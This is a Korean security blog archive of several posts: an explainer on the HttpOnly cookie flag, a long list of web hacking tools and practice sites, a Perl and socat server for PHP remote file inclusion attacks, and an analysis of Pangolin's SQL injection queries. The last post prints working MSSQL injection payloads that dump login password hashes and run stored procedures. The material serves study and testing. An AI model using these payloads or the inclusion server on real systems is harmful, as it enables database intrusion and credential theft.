쿠키의 httponly 를 이용한 쿠키 하이재킹 방지

web/method 2010. 1. 27. 00:02

http://blog.naver.com/kim119z?Redirect=Log&logNo=150053838896

쿠키의 httponly 옵션에 대해서

1. 언제 개발되었나?
-2002년 MS IE6.0 SP1 에서 최초 지원

2. 어떤 동작을 하는가?
   -클라이언트 브라우저에서 쿠키가 생성될때 httponly 옵션이 있으면
    클라이언트 스크립트의 쿠키 요청에 대해서 브라우저는 응답을 하지 않습니다.
   -예를 들어 쿠키 생성시 httponly 옵션이 있다면 javascript 의 document.cookie 메소드를 통해
    쿠키정보를 브라우저로 부터 획득할 수 없습니다.

3. 왜 만들어 졌는가?
-XSS 를 이용한 쿠키 하이재킹에 대응하기 위해 개발된 기술입니다.

4. 지원하는 브라우저
   -Microsoft Internet Explorer 6.0 SP1 이상
   -Mozilla Firefox 3.0.0.6+ 이상
   -Netscape Navigator 9.0b3 이상
   -Opera 9.50 이상
   -Google's Chrome

   -ASP, JSP 같은 웹 언어하고는 상관 없습니다.
    쿠키를 발생하는 Set-Cookie 에 httponly 라는 문자열만 있으면 되며
    클라이언트 측 브라우저가 해당 옵션을 지원하냐 못하냐의 문제입니다.
   -현재 대부분의 최신 브라우저에서 지원하고 있으며 지원하지 않는다고 해서

에러는 발생하지 않고 단지 옵션이 무시됩니다.

5. MS 의 표준화 노력

-ASP.NET 2.0 환경에서는 시스템 쿠키에서 httponly 는 디폴트로 생성이 됩니다.

-MSDN 발췌

"HttpOnly. This property specifies whether the cookie can be accessed by client script. In ASP.NET 2.0, this value is always set to true. Internet Explorer 6 Service Pack 1 supports this cookie attribute, which prevents client-side script from accessing the cookie from the document.cookie property."

http://msdn.microsoft.com/en-us/library/ms533046.aspx
http://blogs.msdn.com/ie8kr/archive/2009/03/17/ie8-5.aspx

http://www.owasp.org/index.php/HTTPOnly
http://msdn.microsoft.com/en-us/library/aa480476.aspx

:

Hack & tools

security 2010. 1. 25. 04:11

Phoenix/Tools From OWASP

https://www.owasp.org/index.php/Phoenix/Tools

LiveCDs

Monday, January 29, 2007 4:02 PM 828569600 AOC_Labrat-ALPHA-0010.iso - http://www.packetfocus.com/hackos/
DVL (Damn Vulnerable Linux) - http://www.damnvulnerablelinux.org/

Test sites / testing grounds

SPI Dynamics (live) - http://zero.webappsecurity.com/
Cenzic (live) - http://crackme.cenzic.com/
Watchfire (live) - http://demo.testfire.net/
Acunetix (live) - http://testphp.acunetix.com/ http://testasp.acunetix.com http://testaspnet.acunetix.com
WebMaven / Buggy Bank (includes live testsite) - http://www.mavensecurity.com/webmaven
Foundstone SASS tools - http://www.foundstone.com/index.htm?subnav=resources/navigation.htm&subcontent=/resources/s3i_tools.htm
OWASP WebGoat - http://www.owasp.org/index.php/OWASP_WebGoat_Project
OWASP SiteGenerator - http://www.owasp.org/index.php/Owasp_SiteGenerator
Stanford SecuriBench - http://suif.stanford.edu/~livshits/securibench/
SecuriBench Micro - http://suif.stanford.edu/~livshits/work/securibench-micro/

HTTP proxying / editing

WebScarab - http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
Burp - http://www.portswigger.net/
Paros - http://www.parosproxy.org/
Fiddler - http://www.fiddlertool.com/
Web Proxy Editor - http://www.microsoft.com/mspress/companion/0-7356-2187-X/
Pantera - http://www.owasp.org/index.php/Category:OWASP_Pantera_Web_Assessment_Studio_Project
Suru - http://www.sensepost.com/research/suru/
httpedit (curses-based) - http://www.neutralbit.com/en/rd/httpedit/
Charles - http://www.xk72.com/charles/
Odysseus - http://www.bindshell.net/tools/odysseus
Burp, Paros, and WebScarab for Mac OS X - http://www.corsaire.com/downloads/
Web-application scanning tool from `Network Security Tools'/O'Reilly - http://examples.oreilly.com/networkst/
JS Commander - http://jscmd.rubyforge.org/

RSnake's XSS cheat sheet based-tools, webapp fuzzing, and encoding tools

Wfuzz - http://www.edge-security.com/wfuzz.php
ProxMon - http://www.isecpartners.com/proxmon.html
Wapiti - http://wapiti.sourceforge.net/
Grabber - http://rgaucher.info/beta/grabber/
XSSScan - http://darkcode.ath.cx/scanners/XSSscan.py
CAL9000 - http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project
HTMangLe - http://www.fishnetsecurity.com/Tools/HTMangLe/publish.htm
JBroFuzz - http://sourceforge.net/projects/jbrofuzz
XSSFuzz - http://ha.ckers.org/blog/20060921/xssfuzz-released/
WhiteAcid's XSS Assistant - http://www.whiteacid.org/greasemonkey/
Overlong UTF - http://www.microsoft.com/mspress/companion/0-7356-2187-X/
[TGZ] MielieTool (SensePost Research) - http://packetstormsecurity.org/UNIX/utilities/mielietools-v1.0.tgz
RegFuzzer: test your regular expression filter - http://rgaucher.info/b/index.php/post/2007/05/26/RegFuzzer%3A-Test-your-regular-expression-filter
screamingCobra - http://www.dachb0den.com/projects/screamingcobra.html
SPIKE and SPIKE Proxy - http://immunitysec.com/resources-freesoftware.shtml
RFuzz - http://rfuzz.rubyforge.org/
WebFuzz - http://www.codebreakers-journal.com/index.php?option=com_content&task=view&id=112&Itemid=99999999
TestMaker - http://www.pushtotest.com/Docs/downloads/features.html
ASP Auditor - http://michaeldaw.org/projects/asp-auditor-v2/
WSTool - http://wstool.sourceforge.net/
Web Hack Control Center (WHCC) - http://ussysadmin.com/whcc/
Web Text Converter - http://www.microsoft.com/mspress/companion/0-7356-2187-X/
HackBar (Firefox Add-on) - https://addons.mozilla.org/firefox/3899/
Net-Force Tools (NF-Tools, Firefox Add-on) - http://www.net-force.nl/library/downloads/
PostIntercepter (Greasemonkey script) - http://userscripts.org/scripts/show/743

HTTP general testing / fingerprinting

Wbox: HTTP testing tool - http://hping.org/wbox/
ht://Check - http://htcheck.sourceforge.net/
Mumsie - http://www.lurhq.com/tools/mumsie.html
WebInject - http://www.webinject.org/
Torture.pl Home Page - http://stein.cshl.org/~lstein/torture/
JoeDog's Seige - http://www.joedog.org/JoeDog/Siege/
OPEN-LABS: metoscan (http method testing) - http://www.open-labs.org/
Load-balancing detector - http://ge.mine.nu/lbd.html
HMAP - http://ujeni.murkyroc.com/hmap/
Net-Square: httprint - http://net-square.com/httprint/
Wpoison: http stress testing - http://wpoison.sourceforge.net/
Net-square: MSNPawn - http://net-square.com/msnpawn/index.shtml
hcraft: HTTP Vuln Request Crafter - http://druid.caughq.org/projects/hcraft/
rfp.labs: LibWhisker - http://www.wiretrip.net/rfp/lw.asp
Nikto - http://www.cirt.net/code/nikto.shtml
twill - http://twill.idyll.org/
DirBuster - http://www.sittinglittleduck.com/DirBuster/
[ZIP] DFF Scanner - http://security-net.biz/files/dff/DFF.zip
[ZIP] The Elza project - http://packetstormsecurity.org/web/elza-1.4.7-beta.zip http://www.stoev.org/elza.html

Browser-based HTTP tampering / editing / replaying

TamperIE - http://www.bayden.com/Other/
isr-form - http://www.infobyte.com.ar/developments.html
Modify Headers (Firefox Add-on) - http://modifyheaders.mozdev.org/
Tamper Data (Firefox Add-on) - http://tamperdata.mozdev.org/
UrlParams (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/1290/
TestGen4Web (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/1385/
DOM Inspector / Inspect This (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/1806/ https://addons.mozilla.org/en-US/firefox/addon/1913/
LiveHTTPHeaders / Header Monitor (Firefox Add-on) - http://livehttpheaders.mozdev.org/ https://addons.mozilla.org/en-US/firefox/addon/575/

Cookie editing / poisoning

[TGZ] stompy: session id tool - http://lcamtuf.coredump.cx/stompy.tgz
Add'N Edit Cookies (AnEC, Firefox Add-on) - http://addneditcookies.mozdev.org/
CookieCuller (Firefox Add-on) - http://cookieculler.mozdev.org/
CookiePie (Firefox Add-on) - http://www.nektra.com/oss/firefox/extensions/cookiepie/
CookieSpy - http://www.codeproject.com/shell/cookiespy.asp
Cookies Explorer - http://www.dutchduck.com/Features/Cookies.aspx

Ajax and XHR scanning

Sahi - http://sahi.co.in/
scRUBYt - http://scrubyt.org/
jQuery - http://jquery.com/
jquery-include - http://www.gnucitizen.org/projects/jquery-include
Sprajax - http://www.denimgroup.com/sprajax.html
Watir - http://wtr.rubyforge.org/
Watij - http://watij.com/
Watin - http://watin.sourceforge.net/
RBNarcissus - http://idontsmoke.co.uk/2005/rbnarcissus/
SpiderTest (Spider Fuzz plugin) - http://blog.caboo.se/articles/2007/2/21/the-fabulous-spider-fuzz-plugin
Javascript Inline Debugger (jasildbg) - http://jasildbg.googlepages.com/
Firebug Lite - http://www.getfirebug.com/lite.html
firewaitr - http://code.google.com/p/firewatir/

RSS extensions and caching

LiveLines (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/324/
rss-cache - http://www.dubfire.net/chris/projects/rss-cache/

SQL injection scanning

0x90.org: home of Absinthe, Mezcal, etc - http://0x90.org/releases.php
SQLiX - http://www.owasp.org/index.php/Category:OWASP_SQLiX_Project
sqlninja: a SQL Server injection and takover tool - http://sqlninja.sourceforge.net/
JustinClarke's SQL Brute - http://www.justinclarke.com/archives/2006/03/sqlbrute.html
BobCat - http://www.northern-monkee.co.uk/projects/bobcat/bobcat.html
sqlmap - http://sqlmap.sourceforge.net/
Scully: SQL Server DB Front-End and Brute-Forcer - http://www.sensepost.com/research/scully/
FG-Injector - http://www.flowgate.net/?lang=en&seccion=herramientas
PRIAMOS - http://www.priamos-project.com/

Web application security malware, backdoors, and evil code

W3AF: Web Application Attack and Audit Framework - http://w3af.sourceforge.net/
Jikto - http://busin3ss.name/jikto-in-the-wild/
XSS Shell - http://ferruh.mavituna.com/article/?1338
XSS-Proxy - http://xss-proxy.sourceforge.net
AttackAPI - http://www.gnucitizen.org/projects/attackapi/
FFsniFF - http://azurit.elbiahosting.sk/ffsniff/
HoneyBlog's web-based junkyard - http://honeyblog.org/junkyard/web-based/
BeEF - http://www.bindshell.net/tools/beef/
Firefox Extension Scanner (FEX) - http://www.gnucitizen.org/projects/fex/
What is my IP address? - http://reglos.de/myaddress/
xRumer: blogspam automation tool - http://www.botmaster.net/movies/XFull.htm
SpyJax - http://www.merchantos.com/makebeta/tools/spyjax/
Greasecarnaval - http://www.gnucitizen.org/projects/greasecarnaval
Technika - http://www.gnucitizen.org/projects/technika/
Load-AttackAPI bookmarklet - http://www.gnucitizen.org/projects/load-attackapi-bookmarklet
MD's Projects: JS port scanner, pinger, backdoors, etc - http://michaeldaw.org/my-projects/

Web application services that aid in web application security assessment

Netcraft - http://www.netcraft.net
AboutURL - http://www.abouturl.com/
The Scrutinizer - http://www.scrutinizethis.com/
net.toolkit - http://clez.net/
ServerSniff - http://www.serversniff.net/
Online Microsoft script decoder - http://www.greymagic.com/security/tools/decoder/
Webmaster-Toolkit - http://www.webmaster-toolkit.com/
myIPNeighbbors, et al - http://digg.com/security/MyIPNeighbors_Find_Out_Who_Else_is_Hosted_on_Your_Site_s_IP_Address
PHP charset encoding - http://h4k.in/encoding
data: URL testcases - http://h4k.in/dataurl

Browser-based security fuzzing / checking

Zalewski's MangleMe - http://lcamtuf.coredump.cx/mangleme/mangle.cgi
hdm's tools: Hamachi, CSSDIE, DOM-Hanoi, AxMan - http://metasploit.com/users/hdm/tools/
Peach Fuzzer Framework - http://peachfuzz.sourceforge.net/
TagBruteForcer - http://research.eeye.com/html/tools/RT20060801-3.html
PROTOS Test-Suite: c05-http-reply - http://www.ee.oulu.fi/research/ouspg/protos/testing/c05/http-reply/index.html
COMRaider - http://labs.idefense.com
bcheck - http://bcheck.scanit.be/bcheck/
Stop-Phishing: Projects page - http://www.indiana.edu/~phishing/?projects
LinkScanner - http://linkscanner.explabs.com/linkscanner/default.asp
BrowserCheck - http://www.heise-security.co.uk/services/browsercheck/
Cross-browser Exploit Tests - http://www.jungsonnstudios.com/cool.php
Stealing information using DNS pinning demo - http://www.jumperz.net/index.php?i=2&a=1&b=7
Javascript Website Login Checker - http://ha.ckers.org/weird/javascript-website-login-checker.html
Mozilla Activex - http://www.iol.ie/~locka/mozilla/mozilla.htm
Jungsonn's Black Dragon Project - http://blackdragon.jungsonnstudios.com/
Mr. T (Master Recon Tool, includes Read Firefox Settings PoC) - http://ha.ckers.org/mr-t/
Vulnerable Adobe Plugin Detection For UXSS PoC - http://www.0x000000.com/?i=324
About Flash: is your flash up-to-date? - http://www.macromedia.com/software/flash/about/
Test your installation of Java software - http://java.com/en/download/installed.jsp?detect=jre&try=1

PHP static analysis and file inclusion scanning

PHP-SAT.org: Static analysis for PHP - http://www.program-transformation.org/PHP/
Unl0ck Research Team: tool for searching in google for include bugs - http://unl0ck.net/tools.php
FIS: File Inclusion Scanner - http://www.segfault.gr/index.php?cat_id=3&cont_id=25
PHPSecAudit - http://developer.spikesource.com/projects/phpsecaudit

Web Application Firewall (WAF) and Intrusion Detection (APIDS) rules and resources

APIDS on Wikipedia - http://en.wikipedia.org/wiki/APIDS
PHP Intrusion Detection System (PHP-IDS) - http://php-ids.org/ http://code.google.com/p/phpids/
dotnetids - http://code.google.com/p/dotnetids/
Secure Science InterScout - http://www.securescience.com/home/newsandevents/news/interscout1.0.html
Remo: whitelist rule editor for mod_security - http://remo.netnea.com/
GotRoot: ModSecuirty rules - http://www.gotroot.com/tiki-index.php?page=mod_security+rules
The Web Security Gateway (WSGW) - http://wsgw.sourceforge.net/
mod_security rules generator - http://noeljackson.com/tools/modsecurity/
Mod_Anti_Tamper - http://www.wisec.it/projects.php?id=3
[TGZ] Automatic Rules Generation for Mod_Security - http://www.wisec.it/rdr.php?fn=/Projects/Rule-o-matic.tgz
AQTRONIX WebKnight - http://www.aqtronix.com/?PageID=99
Akismet: blog spam defense - http://akismet.com/
Samoa: Formal tools for securing web services - http://research.microsoft.com/projects/samoa/

Web services enumeration / scanning / fuzzing

WebServiceStudio2.0 - http://www.gotdotnet.com/Community/UserSamples/Details.aspx?SampleGuid=65a1d4ea-0f7a-41bd-8494-e916ebc4159c
Net-square: wsChess - http://net-square.com/wschess/index.shtml
WSFuzzer - http://www.owasp.org/index.php/Category:OWASP_WSFuzzer_Project
SIFT: web method search tool - http://www.sift.com.au/73/171/sift-web-method-search-tool.htm
iSecPartners: WSMap, WSBang, etc - http://www.isecpartners.com/tools.html

Web application non-specific static source-code analysis

Pixy: a static analysis tool for detecting XSS vulnerabilities - http://www.seclab.tuwien.ac.at/projects/pixy/
Brixoft.Net: Source Edit - http://www.brixoft.net/prodinfo.asp?id=1
Security compass web application auditing tools (SWAAT) - http://www.owasp.org/index.php/Category:OWASP_SWAAT_Project
An even more complete list here - http://www.cs.cmu.edu/~aldrich/courses/654/tools/
A nice list that claims some demos available - http://www.cs.cmu.edu/~aldrich/courses/413/tools.html
A smaller, but also good list - http://spinroot.com/static/

Static analysis for C/C++ (CGI, ISAPI, etc) in web applications

RATS - http://www.securesoftware.com/resources/download_rats.html
ITS4 - http://www.cigital.com/its4/
FlawFinder - http://www.dwheeler.com/flawfinder/
Splint - http://www.splint.org/
Uno - http://spinroot.com/uno/
BOON (Buffer Overrun detectiON) - http://www.cs.berkeley.edu/~daw/boon/ http://boon.sourceforge.net
Valgrind - http://www.valgrind.org/

Java static analysis, security frameworks, and web application security tools

HDIV Struts - http://hdiv.org/
Orizon - http://sourceforge.net/projects/orizon/
FindBugs: Find bugs in Java programs - http://findbugs.sourceforge.net/
PMD - http://pmd.sourceforge.net/
CUTE: A Concolic Unit Testing Engine for C and Java - http://osl.cs.uiuc.edu/~ksen/cute/
EMMA - http://emma.sourceforge.net/
JLint - http://jlint.sourceforge.net/
Java PathFinder - http://javapathfinder.sourceforge.net/
Fujaba: Move between UML and Java source code - http://wwwcs.uni-paderborn.de/cs/fujaba/
Checkstyle - http://checkstyle.sourceforge.net/
Cookie Revolver Security Framework - http://sourceforge.net/projects/cookie-revolver
tinapoc - http://sourceforge.net/projects/tinapoc
jarsigner - http://java.sun.com/j2se/1.5.0/docs/tooldocs/solaris/jarsigner.html
Solex - http://solex.sourceforge.net/
Java Explorer - http://metal.hurlant.com/jexplore/
HTTPClient - http://www.innovation.ch/java/HTTPClient/
another HttpClient - http://jakarta.apache.org/commons/httpclient/
a list of code coverage and analysis tools for Java - http://mythinkpond.blogspot.com/2007/06/java-foss-freeopen-source-software.html

Microsoft .NET static analysis and security framework tools, mostly for ASP.NET and ASP.NET AJAX, but also C# and VB.NET

Orcas - http://msdn.microsoft.com/vstudio/express/future/downloads/default.aspx
Web Development Helper - http://www.nikhilk.net/Project.WebDevHelper.aspx
FxCop - http://blogs.msdn.com/fxcop/ http://www.gotdotnet.com/team/fxcop/
Microsoft Application Verifier - http://www.microsoft.com/technet/prodtechnol/windows/appcompatibility/appverifier.mspx
Microsoft internal tools you can't have yet - http://www.microsoft.com/windows/cse/pa_projects.mspx http://research.microsoft.com/Pex/ http://www.owasp.org/images/5/5b/OWASP_IL_7_FuzzGuru.pdf

Threat modeling

Microsoft Threat Analysis and Modeling Tool v2.1 (TAM) - http://www.microsoft.com/downloads/details.aspx?FamilyID=59888078-9daf-4e96-b7d1-944703479451&displaylang=en
Amenaza: Attack Tree Modeling (SecurITree) - http://www.amenaza.com/software.php
Octotrike - http://www.octotrike.org/

Add-ons for Firefox that help with general web application security

Add-ons for Firefox that help with Javascript and Ajax web application security

Selenium IDE - http://www.openqa.org/selenium-ide/
Firebug - http://www.joehewitt.com/software/firebug/
Venkman - http://www.mozilla.org/projects/venkman/
Chickenfoot - http://groups.csail.mit.edu/uid/chickenfoot/
Greasemonkey - http://www.greasespot.net/
Greasemonkey compiler - http://www.letitblog.com/greasemonkey-compiler/
User script compiler - http://arantius.com/misc/greasemonkey/script-compiler
Extension Developer's Extension (Firefox Add-on) - http://ted.mielczarek.org/code/mozilla/extensiondev/
Smart Middle Click (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/3885/

Bookmarklets that aid in web application security

RSnake's security bookmarklets - http://ha.ckers.org/bookmarklets.html
BMlets - http://optools.awardspace.com/bmlet.html
Huge list of bookmarklets - http://www.squarefree.com/bookmarklets/
Blummy: consists of small widgets, called blummlets, which make use of Javascript to provide rich functionality - http://www.blummy.com/
Bookmarklets every blogger should have - http://www.micropersuasion.com/2005/10/bookmarklets_ev.html
Flat Bookmark Editing (Firefox Add-on) - http://n01se.net/chouser/proj/mozhack/
OpenBook and Update Bookmark (Firefox Add-ons) - http://www.chuonthis.com/extensions/

SSL certificate checking / scanning

[ZIP] THCSSLCheck - http://thc.org/root/tools/THCSSLCheck.zip
[ZIP] Foundstone SSLDigger - http://www.foundstone.com/us/resources/termsofuse.asp?file=ssldigger.zip
Cert Viewer Plus (Firefox Add-on) - https://addons.mozilla.org/firefox/1964/

Honeyclients, Web Application, and Web Proxy honeypots

Honeyclient Project: an open-source honeyclient - http://www.honeyclient.org/trac/
HoneyC: the low-interaction honeyclient - http://honeyc.sourceforge.net/
Capture: a high-interaction honeyclient - http://capture-hpc.sourceforge.net/
Google Hack Honeypot - http://ghh.sourceforge.net/
PHP.Hop - PHP Honeynet Project - http://www.rstack.org/phphop/
SpyBye - http://www.monkey.org/~provos/spybye/
Honeytokens - http://www.securityfocus.com/infocus/1713

Blackhat SEO and maybe some whitehat SEO

SearchStatus (Firefox Add-on) - http://www.quirk.biz/searchstatus/
SEO for Firefox (Firefox Add-on) - http://tools.seobook.com/firefox/seo-for-firefox.html
SEOQuake (Firefox Add-on) - http://www.seoquake.com/

Footprinting for web application security

Evolution - http://www.paterva.com/evolution-e.html
GooSweep - http://www.mcgrewsecurity.com/projects/goosweep/
Aura: Google API Utility Tools - http://www.sensepost.com/research/aura/
Edge-Security tools - http://www.edge-security.com/soft.php
Fierce Domain Scanner - http://ha.ckers.org/fierce/
Googlegath - http://www.nothink.org/perl/googlegath/
Advanced Dork (Firefox Add-on) - https://addons.mozilla.org/firefox/2144/
Passive Cache (Firefox Add-on) - https://addons.mozilla.org/firefox/977/
CacheOut! (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/1453/
BugMeNot Extension (Firefox Add-on) - http://roachfiend.com/archives/2005/02/07/bugmenot/
TrashMail.net Extension (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/1813/
DiggiDig (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/2819/
Digger (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/1467/

Database security assessment

Scuba by Imperva Database Vulnerability Scanner - http://www.imperva.com/scuba/

Browser Defenses

Browser Privacy

TrackMeNot (Firefox Add-on) - https://addons.mozilla.org/firefox/3173/
Privacy Bird - http://www.privacybird.com/

Application and protocol fuzzing (random instead of targeted)

Sulley - http://fuzzing.org/
taof: The Art of Fuzzing - http://sourceforge.net/projects/taof/
zzuf: multipurpose fuzzer - http://sam.zoy.org/zzuf/
autodafé: an act of software torture - http://autodafe.sourceforge.net/
EFS and GPF: Evolutionary Fuzzing System - http://www.appliedsec.com/resources.html

'security' 카테고리의 다른 글

war Game site - (0)	2010.04.28
각 port 번호 별 설명 (1)	2010.03.25
port (0)	2010.01.27
test and Demonstration site (0)	2010.01.25
Hacking Without All the Jailtime (0)	2010.01.25

:

test and Demonstration site

security 2010. 1. 25. 04:10

http://demo.testfire.net/feedback.aspx

http://test.acunetix.com/categories.php

Test sites / testing grounds

SPI Dynamics (live) - http://zero.webappsecurity.com/
Cenzic (live) - http://crackme.cenzic.com/
Watchfire (live) - http://demo.testfire.net/
Acunetix (live) - http://testphp.acunetix.com/ http://testasp.acunetix.com http://testaspnet.acunetix.com
WebMaven / Buggy Bank (includes live testsite) - http://www.mavensecurity.com/webmaven
Foundstone SASS tools - http://www.foundstone.com/index.htm?subnav=resources/navigation.htm&subcontent=/resources/s3i_tools.htm
OWASP WebGoat - http://www.owasp.org/index.php/OWASP_WebGoat_Project
OWASP SiteGenerator - http://www.owasp.org/index.php/Owasp_SiteGenerator
Stanford SecuriBench - http://suif.stanford.edu/~livshits/securibench/
SecuriBench Micro - http://suif.stanford.edu/~livshits/work/securibench-micro/

'security' 카테고리의 다른 글

war Game site - (0)	2010.04.28
각 port 번호 별 설명 (1)	2010.03.25
port (0)	2010.01.27
Hack & tools (0)	2010.01.25
Hacking Without All the Jailtime (0)	2010.01.25

:

Hacking Without All the Jailtime

security 2010. 1. 25. 04:00

http://ha.ckers.org/blog/20090406/hacking-without-all-the-jailtime/

Hacking Without All the Jailtime

There’s been more and more legislation put in place to try to discourage hacking in general, and even tool development. Not that I think it’ll lead to many prosecutions anywhere, but nevertheless, it’s always nice to have a place to test. I got an email from one of my readers asking about the hackme series:

Hello and thank you for an awesome blog, and a daily read.

I while back you mentioned some “ready-made” websites that were used in the web app sec sphere to test scanners and specific tools. More specifically you mentioned 2, one of which that was somewhat depreciated, but still had some educational value. I’ve been looking though your posts, but I have had no success finding this entry.

I’ll do one better - here’s a short list I compiled that includes a lot of the more popular tools for ethical testing, without all the muss and fuss of prison time. If you want to hone your skills or just have some fun at work, try these out (in no particular order):

If there are others that should be added to this list, please drop me a line and I’ll add them. I hope everyone had a good April 1st and that insurance covers whatever was damaged.

'security' 카테고리의 다른 글

war Game site - (0)	2010.04.28
각 port 번호 별 설명 (1)	2010.03.25
port (0)	2010.01.27
Hack & tools (0)	2010.01.25
test and Demonstration site (0)	2010.01.25

:

PHP remote include 공격시 사용툴

web/include 2010. 1. 21. 02:28

PHP remote include 공격시 사용툴

swbae.egloos.com/2538548

PHP remote include 공격시 별도의 웹 서버를 올릴 필요 없이 간단히 공격하는 툴.
Fedora에서 netcat이 Original netcat과 다른 동작을 보여서(아마 GNU netcat인 듯) 올려둔다.

#!/usr/bin/perl

use strict;
use warnings;
use IO::Socket;

my $open_file="./info.php";

sub Wait {
wait;           #wait needed to keep <defunct> pids from building up
}

$SIG{CHLD} = \&Wait;

my $server = IO::Socket::INET->new(LocalPort => 8080,
                                   Type => SOCK_STREAM,
                                   Reuse => 1,
                                   Listen => 10) or die "$@\n";
my $client ;

while ( $client = $server->accept()) {
next if my $pid = fork;
die "fork - $!\n" unless defined $pid;

select $client;
$_ = 1;
print $client "HTTP/1.0 200 OK\r\n";
print $client "Content-type: text/html\r\n\r\n";

# print $client '<?php phpinfo(); ?>';
open(FH, "<$open_file");
$| = 1;
my @lines=<FH>;
foreach (@lines) {
    print $_;
}
close(FH);

close($client);
exit( fork );
} continue {
close($client);               #kills hangs
kill CHLD => -$$;
}

자체적으로 웹 서버 역할을 하며 소스를 변경하면 포트 변경, 실행 가능한 명령어 변경 가능함.

혹은 socat이 사용가능하다면 아래와 같이 할 수 있음.
아래와 같은 shell script를 php_inc_ex.sh로 저장하여 chmod 755 php_inc_ex.sh한 후 주석과 같이 실행 함.

#!/bin/sh
# socat TCP4-LISTEN:8080,fork EXEC:./php_inc_ex.sh

echo "HTTP/1.0 200 OK";
echo "Content-type: text/html";
echo "";
echo '<?php phpinfo(); ?>';

주의사항: shell script의 경우 직접 출력이나 here 문을 이용한 출력은 문제가 없는데, 다른 파일을 읽어서 출력하는 경우 broken pipe가 많이 발생한다.

:

Pangolin Professional Edition v3.0.0.1011 쿼리 간단 분석

web/injection 2010. 1. 7. 02:33

http://malwarelab.tistory.com/64

악성코드는 아니지만 SQL Injection Tool로 유명한 판골린을 분석해보았습니다.
어떤 쿼리를 날려서 인젝션을 수행하는지...

이전 버전 사용할때 대부분 옵션은 그냥 디폴트로 놓고 사용했었는데요
이번에는 옵션을 바꿔가면서 어떤 쿼리를 날리는지 확인해봤습니다.

먼저 확인해 볼 부분은 Setting -> Advanced입니다.

Replace space as /**/ , + , %09 , [TAB]
Bypass firewall filter when 'select' is not allow
Auto-analyzing keyword
URI Encode Mode
Enable BT Model (bypass firewall)
Stop after error happens(access data)
Auto check record count of tables

옵션은 모두 7가지였고 공백(space)을 대체하는 곳에서 4가지 기능이 있었습니다.
디폴트 옵션은 Auto-analyzing keyword입니다.

하나씩 선택해서 패킷을 떠 보았는데 테스트는 실행버튼(▶) 클릭해서 기본적으로 수집할 대상을 선정한 후에 Select All, Go 버튼을 클릭해서 기본 정보만 수집하는 테스트만 했습니다.

먼저 어떤 쿼리를 날리는지부터 확인해보고 각 옵션간의 어떤 차이점을 보이는지 확인해보도록 하겠습니다.

0x01 Pangolin SQL Injection Query

and db_name()>0--
and @@version>1--
and db_name()>0--
and @@servername>0--
and host_name()=0--
and system_user>0--
and user>0--
and cast(is_srvrolemember(0x730079007300610064006d0069006e00) as nvarchar(1))+char(124)=1 and 1=1
and (select top 1 cast([name] as nvarchar(500))+char(94) from [master].[dbo].[sysdatabases] where [dbid] in (select top 1 [dbid] from [master].[dbo].[sysdatabases] order by [dbid] desc))>0--
and (select top 1 cast([name] as nvarchar(500))+char(94) from [master].[dbo].[sysdatabases] where [dbid] in (select top 2 [dbid] from [master].[dbo].[sysdatabases] order by [dbid] desc))>0--
and (select top 1 cast([name] as nvarchar(500))+char(94) from [master].[dbo].[sysdatabases] where [dbid] in (select top 3 [dbid] from [master].[dbo].[sysdatabases] order by [dbid] desc))>0--
and (select top 1 cast([name] as nvarchar(500))+char(94) from [master].[dbo].[sysdatabases] where [dbid] in (select top 4 [dbid] from [master].[dbo].[sysdatabases] order by [dbid] desc))>0--
and (select top 1 cast([name] as nvarchar(500))+char(94) from [master].[dbo].[sysdatabases] where [dbid] in (select top 5 [dbid] from [master].[dbo].[sysdatabases] order by [dbid] desc))>0--
and (select top 1 cast([name] as nvarchar(500))+char(94) from [master].[dbo].[sysdatabases] where [dbid] in (select top 6 [dbid] from [master].[dbo].[sysdatabases] order by [dbid] desc))>0--
;drop table pangolin_test_table;--
;create table pangolin_test_table(name nvarchar(255),low nvarchar(255),high nvarchar(255),type nvarchar(255));--
;insert pangolin_test_table exec master.dbo.xp_availablemedia;--
and 0<(select top 1 cast([name] as nvarchar(4000))+char(94)+cast([type] as nvarchar(4000)) from(select top 1 [name],[low],[high],[type] from pangolin_test_table group by [name],[low],[high],[type] order by [name]) t order by [name] desc)--
and 0<(select top 1 cast([name] as nvarchar(4000))+char(94)+cast([type] as nvarchar(4000)) from(select top 2 [name],[low],[high],[type] from pangolin_test_table group by [name],[low],[high],[type] order by [name]) t order by [name] desc)--
;drop table pangolin_test_table;--
;drop table pangolin_test_table;--
;create table pangolin_test_table(name nvarchar(255),description nvarchar(4000));--
;insert pangolin_test_table exec master.dbo.xp_enumgroups;--
and 0<(select top 1 cast([name] as nvarchar(4000))+char(94)+cast([description] as nvarchar(4000)) from(select top 1 [name],[description] from pangolin_test_table group by [name],[description] order by [name]) t order by [name] desc)--
and 0<(select top 1 cast([name] as nvarchar(4000))+char(94)+cast([description] as nvarchar(4000)) from(select top 2 [name],[description] from pangolin_test_table group by [name],[description] order by [name]) t order by [name] desc)--
;drop table pangolin_test_table;--
and 0<(select top 1 cast([name] as nvarchar(4000))+char(94)+isnull(master.dbo.fn_varbintohexstr([password_hash]),char(32)) from(select top 1 [name],[password_hash] from [master].[sys].[sql_logins] order by [name]) t order by [name] desc)--
and 0<(select top 1 cast([name] as nvarchar(4000))+char(94)+isnull(master.dbo.fn_varbintohexstr([password_hash]),char(32)) from(select top 2 [name],[password_hash] from [master].[sys].[sql_logins] order by [name]) t order by [name] desc)--

기본적으로 날리는 쿼리는 위와 같습니다.
빨간색으로 표시된 부분을 보시면 pangolin_test_table이라는 테이블을 만들어서(create) 특정 데이터를 삽입(insert)한 후에 이 테이블에서 데이터를 선택(select)하고 모든 작업이 끝나면 테이블을 삭제(drop)하고 있습니다.

이렇게해서 확인된 정보는 UI에 출력됩니다.

기본 옵션(Auto-analyzing keyword)을 사용하면 공백(space)을 %20으로 대체해서 쿼리를 날립니다.
수작업할때는 그냥 공백으로 넣어도 결국 %20으로 바꿔서 URL을 요청하는 것과 동일한 방식입니다.

0x02 Pangolin SQL Injection Query by Advanced Setting

